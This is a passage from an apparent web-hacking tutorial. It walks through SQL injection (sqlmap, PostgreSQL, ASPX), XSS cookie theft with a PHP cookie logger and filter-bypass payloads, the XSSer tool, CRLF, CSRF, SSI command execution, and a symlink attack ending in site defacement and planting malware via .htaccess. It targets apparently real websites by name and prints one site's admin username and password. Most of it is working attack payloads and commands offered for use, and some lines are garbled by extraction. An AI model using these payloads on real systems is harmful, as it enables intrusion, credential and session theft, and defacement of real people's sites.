http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ where+id=1+limit+0,1)1,1))>from DEC letter
8) Taking data from columns using sqlmap
As you noticed already that you need a lot of time to get data from columns I would suggest you
to use sqlmap.
Download:
Code:
http://sqlmap.org/
Python download:
Code:
http://www.python.org/download/
Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for getting data with Blind SQL Injection for windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name)"
NOTE: for unix put python before sqlmal.py
So it should look like:
Code:
43. python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name)"
If there is more users as I said then use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name
where id=1)"
After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part
of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from
table_name where userid=1
44. Postgre SQL Injection :
1) Postgre SQL Injection?
Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not
MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions
that we will use, you will see.
1) Finding vulnerable sites
Finding site vulnerability is same as usual SQL Injection, which means that we can use Google
dorks.
Here is some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link.
Code:
http://www.link.com/page.php?page=1'
So if on page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
or some part of page disappear then site is vulnerable.
4) Finding number of columns
So we know that site is vulnerable, now we need to find column number. We will do it with
union function this time.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-
If page is loaded normally that means that there is more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from
dual--
We are adding null all the time till we get error. If we get error with 7 null, it means that we have
6 columns, which means 6 nulls.
45. 5) Finding vulnerable columns
It is just so easy to find column vulnerability. Null = 0, which means that everything you put
instead of certain null, if nothing happens it means that columns is not usable. That is how we
gonna find vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,
null,null--+-
If there is nothing listed, it means that column is not usable we will move on next, and this one
back to null.
6) Finding database version
We are doing this with version() function.
Link will show us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null
--+-
we will get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
7) Finding table name
Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all
table_name,null,null,null+from+information_schema.tables--+-
We will get table names also the columns from tables.
8) Finding column name
It is also easy, and there is no big difference.
This is how it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all
column_name,null,null,null+from+information_schema.columns+where+table_name=u
ser s--+-
Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:
46. Code:
http://easycalculation.com/ascii-hex.php
So we have link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,nu
ll+from+information_sch ema.columns+where+table_name||CHR(61)||users--+-
9) Taking data from columns
Also almost same as usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||passw
ord+from+users--+-
47. Error based Postgre SQL Injection :
1) Error based Postgre SQL Injection?
Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference
is that you can get all tables, columns and values from columns etc. As title says attack is based
on errors, and all results will be shown in errors.
2) Finding vulnerable sites
Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
Add ' at end of link:
Code:
http://www.link.com/page.php?page=1'
so if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
site is vulnerable.
4) Finding database version
Use version() function. In this type of attack query looks a bit complicated then usual SQL
Injection so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--
If function is loaded successfully you will get this on page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC
gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
from where we get database version:
Code:
48. PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
5) Finding table name
As I said at start we are not able to get all tables in same time so we gonna use limit and offset
functions.
We will use offset to say which result from base we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform
ation_schema.tables+limit+1+offset+0)+as+int)--
on page we will get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "pg_type"
from this we have table pg_type.
to get next table we gonna change offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform
ation_schema.tables+limit+1+offset+1)+as+int)--
and we gonna get table like pg_attribute.
6) Finding column name
First you have to do is to convert table name into decimal.
We will use:
Code:
http://easycalculation.com/ascii-hex.php
type string admin and you will get decimal code:
Code:
97 100 109 105 110
We will change this code a bit, so it should look like this:
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)
Now we will put it for table names and get columns.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor
mation_schema.columns+w
here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit
+1 +offset+0)+as+int)--
49. and we will get column id. We gonna change offset all the time till site back us on home page,
which means that there is no more columns in that table.
7) Taking data from columns
We found column username and password and now we want to get data from column.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+p
assword+from+admin+limit+1+offset+0)+as+int)--
and we will get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
CHR(58) presents two points ( and we use to get two columns at same time.
NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you
should figure it out till now already. So I'm gonna use pics and codes only.
50. SQL Injection on ASPX :
1) Site vulnerability check
Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
We will add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
If you get page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535
2) Finding column name
Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
51. 3) Finding table name
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))
We want admin table, so we type next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))
admin table name is AdminMaster
4) Finding columns in admin table
52. Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster'))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name = 'AdminMaster'
and column_name not in ('Admin_name')))
Columns names:
53. 5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_name from AdminMaster))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_password from AdminMaster))
Code:
Username: admin
Password: pothys!@#
54. Dot net nuke :
DNN is gallery where you can upload on site and in there you can hold pictures and have like
"online gallery". That gallery have hole in itself so you can use it to upload files on site with
extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx
I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklink
gallery.aspx
Now if page is loaded it will look like this:
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and
we type javascript to upload file.
Code:
55. javascript:__doPostBack('ctlURL$cmdUpload','')
Choose File and Text button Upload Selected File will show up.
*on this site letter color matched with background so you will have to select whole page
(CTRL+A) and you will see upload button.
Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt
56. XSS :
1) XSS?
XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it
to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.
2) Required stuff
Mozila FireFox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-
3.0.5&os=win&lang=en-GB
Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-
US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi
It is recommended to have primary knowledge of Javascripts.
3) Testing XSS vulnerability
Sites on which we can use this method are sites where is text input and submit button and on
sites where you can use GET method to print something.
e.g. of GET method:
Code:
www.sitecom/index.php?page=<script>alert("XSS")</script>
Command to check site vulnerability is:
Code:
<script>alert("XSS")</script>
Now I will explain what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"
57. </script> - close script tag
4) XSS types
Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie
in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some
virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.
5) Cookie Stealing
For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script
attach this script on some hosting:
cookie.php
Code:
<?php
$cookie =
$HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt',
'a');
fwrite($file,
$cookie."n");
?>
script executing:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" +
document.cookie;</script>
ili
<script>location.href="http://www.link.com/cookie.php?cookie=" +
document.cookie;</script>
ili
<script>window.open('http://www.link.com/cookie.php?cookie=' +
document.cookie;)</script>
ili
<script>window.location='http://www.link.com/cookie.php?cookie=' +
document.cookie;</script>
How this works?
58. When some user log on page with your cookie logger and you save his cookie. Then we take
cookie and use it. So here is how we do it:
1) Open Mozilla
2) Open Add-on Fire bug
3) Type cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
from this cookie title is PHPSESSID
from this cookie value is b3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing
59. 1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script
delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add
<scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes
If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> then it is
magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,11
9,119,119,46,108
,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111
,1 11,107,105,101,61,)+document.cookie;</scr</script>ipt>
This works when you add code ' or " and when you use integer you do not use ' or "
and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this
tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php
6) Bypass XSS Filters
[1] Types of filters :
[+]Bypass magic_quotes_gpc (if it's on )
[+]Bypass with cryption in full html
[+]Bypass with Obfuscation
[+]Bypass with trying around method
[+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesn'tallow, ", / and ' (it
depends)
60. to bypass it we use :
String.fromCharCode()
We write our code, in the () crypted in ASCII
exemple :
String.fromCharCode(107, 51, 110, 122, 48)
(Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48
And we use it :
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
We will see : k3nz0
We bypassed magic_quotes_gpc :)
[+] Bypass with cryption in full html :
Very simple, we have to encodeour codein full HTTP!
Our code: <script>alert('i am here')</script>
And in full HTTP :
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%6
1%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now, you can inject it :) !
Notice that you can use the tool "Coder" to do encode it in full HTTP
We bypassed filter.
[+] Bypass with Obfuscation :
Very simple too, this filter, don'tallows for exemple these words :
-script
-alert
To bypass it, you change "script" with for exemple "sCriPt", and "alert" with
"ALerT" !
For exemple :
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.
[+] Bypass with trying around method :
Generally, it is in the searchs scripts, we just add "> at the begining to close current
fields : exemple :
http://target.com/search.php?search="><script>alert("hello")</script>
61. 7) XSSER Framework
Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final
Injection(s)]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
62. --De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler,ask, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
63. --retries=RETRIES Retries when the connection timeouts (default 3)
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:
64. --Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code
*Miscellaneous*:
65. --silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
Example :
* Simple injectionfromURL:
$ pythonxsser.py -u"http://host.com"
-------------------
* Simple injectionfromFile,withtor proxy and spoofingHTTP Refererheaders:
$ pythonxsser.py -i "file.txt"--proxy"http://127.0.0.1:8118" --referer"666.666.666.666"
-------------------
* Multiple injectionsfromURL,with automatic payloading,usingtor proxy, injectingonpayloads
character encodingin "Hexadecimal",withverbose outputand saving resultsto file (XSSlist.dat):
$ pythonxsser.py -u"http://host.com" --proxy"http://127.0.0.1:8118" --auto--Hex --verbose-w
-------------------
* Multiple injectionsfromURL,with automatic payloading,usingcaracter encoding mutations (first,
change payload to hexadecimal;second,change to StringFromCharCode the first encoding;third,
reencode to Hexadecimal the second encoding),withHTTP User-Agentspoofed,changingtimeoutto
"20" and using multithreads(5 threads):
$ pythonxsser.py -u"http://host.com" --auto--Cem"Hex,Str,Hex"--user-agent"XSSer!!"--timeout"20"
--threads"5"
-------------------
* Advance injectionfrom File,payloadingyour -own- payload and using Unescape() character
encodingto bypass filters:
$ pythonxsser.py -i "urls.txt"--payload
'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);'--Une
-------------------
66. * InjectionfromDork selecting"duck" engine (XSSerStorm!):
$ pythonxsser.py --De "duck"-d"search.php?"
-------------------
* InjectionfromCrawler with deep3 and 4 pagesto see (XSSerSpider!):
$ pythonxsser.py -c3--Cw=4-u"http://host.com"
-------------------
* Simple injectionfromURL, usingPOST, with statistics results:
$ pythonxsser.py -u"http://host.com"-p"index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injectionsfromURL to a parameter sendingwith GET, usingautomatic payloading,with IP
Octal payloading ofuscationand printeringresults ina "tinyurl" shorteredlink(ready for share!):
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--auto--Doo--shorttinyurl
-------------------
* Simple injectionfromURL, usingGET, injectinga vector in Cookie parameter, trying to use a DOM
shadow space (noserver logging!) and ifexistsany "hole",applyingyour manual final payload
"malicious" code (readyfor real attacks!):
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--Coo--Dom--Fr="!enteryourfinal injectioncode
here!"
-------------------
* Simple injectionfromURL, usingGET and trying to generate with resultsa "malicious" shorteredlink
(is.gd) witha valid DoS (DenegationOfService) browser clientpayload:
$ pythonxsser.py -u"http://host.com" -g"bs/?q="--Dos--short"is.gd"
-------------------
* Multiple injectionstomultiple places,extractingtargets from a list in a FILE, applying automatic
payloading,changing timeoutto "20" and usingmultithreads(5 threads),increasingdelaybetween
petitionsto 10 seconds,injectingparametersin HTTP USer-Agent,HTTP Refererand in Cookie
parameters, usingproxy Tor, with IP Octal ofuscation,with statisticsresults,in verbose mode and
creating shorteredlinks(tinyurl) of any valid injectingpayloadsfound. (real playingmode!):
$ pythonxsser.py -i "list_of_url_targets.txt" --auto--timeout"20" --threads"5"--delay"10"--Xsa--Xsr--
Coo --proxy"http://127.0.0.1:8118" --Doo-s --verbose --Dos--short"tinyurl"
-------------------
* Injectionofuser XSS vector directlyin a malicious -fake- image created "onthe wild",and ready to
be uploaded.
$ pythonxsser.py --Imx"test.png"--payload"!enteryourmaliciousinjectioncode here!"
-------------------
* Report output 'positives' injectionsofa dorkingsearch (using"ask" dorker) directly to a XML file.
$ pythonxsser.py -d"login.php"--De "ask"--xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publishoutput'positives' injectionsofadorking search (using"duck" dorker) directlyto
67. http://identi.ca
(federatedXSSpentestingbotnet)
$ pythonxsser.py -d"login.php"--De "duck"--publish
-------------------
* Create a .swfmovie with XSS code injected
$ pythonxsser.py --fla"name_of_file"
-------------------
* Senda pre-checkinghashto see if target will generate -false positive- results
$ pythonxsser.py -u"host.com"--hash
-------------------
* Multiple fuzzinginjectionsfromurl,includingDCP injectionsandexploitingour "own" code,spoofed
in a shorteredlink, on positive resultsfounded.XSSreal-time exploiting.
$ pythonxsser.py -u"host.com"--auto--Dcp--Fp"enter_your_code_here" --short"is.gd"
-------------------
* ExploitingBase64 code encodingin META tag (rfc2397) in a manual payload of a vulnerable target.
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--payload"valid_vector_injected" --B64
-------------------
* Exploitingour "own" -remote code- ina payload discoveredusingfuzzingand launch it in a browser
directly
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--auto--Fr"my_host/path/code.js" --launch
68. CRLF :
1) CRLF?
Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are
adding new row (n).
2) Vulnerable places
Vulnerable places are anywhere. In this tut. I'm gonna use some chat.
3) Exploiting vulnerability and protection
Lets say if you send message chat will look like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...n1.4.2012 10:30 - Admin: You are right
saiR login database is deleted. Log in here till I get it back:
http://vulnerablesite.com/login.php
If chat is vulnerable, it's gonna look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in
here till I get it back: http://vulnerablesite.com/login.php
We wrote second msg from Admin and users will think that Admin sent it actually and will log
in to site we gave them. With login we are gonna keylog site logins.
4) Vulnerable script
e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
if(!empty($_POST['message']))
{
$message = htmlspecialchars($_POST['message']);
// rest code to send msg
}
}
?>
69. CSRF :
1) CSRF?
Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute
something without knowing username.
2) Vulnerable places
Can be used when you are using GET method. If CSRF is dont successfully, attacker can change
password of some user. Most common vulnerable places are avatars.
3) Exploiting vulnerability
Lets say we have profile link:
Code:
http://www.link.com/profile.php
Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Code:
http://www.link.com/edit_profile.php
Now instead of avatar link we gonna add link from profile editing together with new code using
GET method.
NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.
Add avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword
password is name of input (It can be different, it's best to chekc source code)
Now when we look at avatar we wont be able to see picture (like there is no picture). When other
user watch your avatar, if attack was successful, his password is gonna be changed in one we put.
4) Example Of CSRF File Uploading Vulnerability.
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
73. Server Side Includes | Server Side Inclusion :
1) Introduction Server Side Includes
Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update
DB, send mails and many other functions. SSI is working like when some run script on that site.
Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which
holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes
2) SSI creating
We are starting script with <!--#
Some simple script look like this:
<command> <variable>=<variable content>-->
Code:
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date
With --> we end script.
script e.g.
Code:
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->
3) Server Side Inclusion
Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have
primary knowledge of Bash and Batch programming.
74. Site is vulnerable on SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache
config file.
e.g. we can create file with next command:
Code:
<!--#exec cmd='ls -la'-->
Save this as .shtml file and open it on site.
I think you already know what is going to happen.
Hope this helped you!
75. Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
Malware Attachment On Website :
1] Go to Public Html tab on your 404.php shell &
2] Open .htaccess on your shell
3] and past your malware coading.
76. Sql injection String & Union based :
1. Sql injection String based
[1] Decreption
In String based Sql injection :
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln
to SQLi)
[2] Example
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with
SQLi
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
id=X' order by--+
Alright that you've got the point lets try String Based on some of the other types of SQL
injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases
77. http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of
my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where
table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where
table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5.Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
78. 9. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(table_name,0x0a),4 from information_schema.tables where
table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(column_name,0x0a),4 from information_schema.columns where
table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+
2. Sql injectionUnionbased :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
